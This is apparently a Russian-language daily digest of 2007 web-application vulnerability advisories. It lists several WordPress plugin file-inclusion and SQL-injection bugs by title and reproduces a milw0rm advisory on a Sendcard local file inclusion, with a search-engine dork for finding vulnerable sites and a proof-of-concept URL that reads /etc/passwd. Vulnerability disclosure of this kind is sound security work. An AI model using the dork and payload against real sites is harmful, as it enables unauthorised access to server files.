Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

[ECHO_ADV_81$2007] wordpress plugins wordTube <= 1.43 (wpPATH) Remote File Inclusion Vulnerability

[ECHO_ADV_82$2007] wordpress plugins wp-Table <= 1.43 (inc_dir) Remote File Inclusion Vulnerability

Wordpress plugin myflash <= V1.00  (wppath) RFI Vulnerability

E-Annu (home.php) Remote SQL Injection Vulnerability

From:	ettee <etteeettee_(at)_gmail.com>
Date:	2 мая 2007 г.
Subject:	Sendcard (sendcard.php) Sendcard Local File Inclusion Vulnerability

Sendcard  (sendcard.php) Sendcard Local File Inclusion Vulnerability

Discovered: ettee
Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org
        "powered by Sendcard"

Bug:
"// Get the template details
if(!isset($form) || $form == ''){
   $form = "form";
}
if(!isset($des) || $des == ''){
   $des = "card";
}
if (!isset($template) || $template == '') {
   $template = 'message';
}"

PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00

# milw0rm.com [2007-05-01]